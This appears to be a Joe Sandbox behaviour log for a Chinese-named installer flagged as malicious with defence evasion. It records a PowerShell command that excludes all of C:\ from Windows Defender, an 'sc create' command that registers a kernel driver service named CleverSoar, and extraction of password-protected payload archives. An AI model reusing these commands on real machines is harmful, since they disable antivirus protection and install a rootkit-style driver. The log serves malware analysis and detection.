Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00821E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 008228E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 008BFB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: String function: 6C6C9240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: String function: 6C766F10 appears 728 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000000.1420215618.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002EAE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F52A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.drBinary string: \Device\TfSysMon
Source: tProtect.dll.13.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@140/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C695D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C695D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00829313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00829313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00833D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00833D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00829252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_00829252
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C695240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,7_2_6C695240
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-IOBOI.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2340:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeVirustotal: Detection: 8%
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
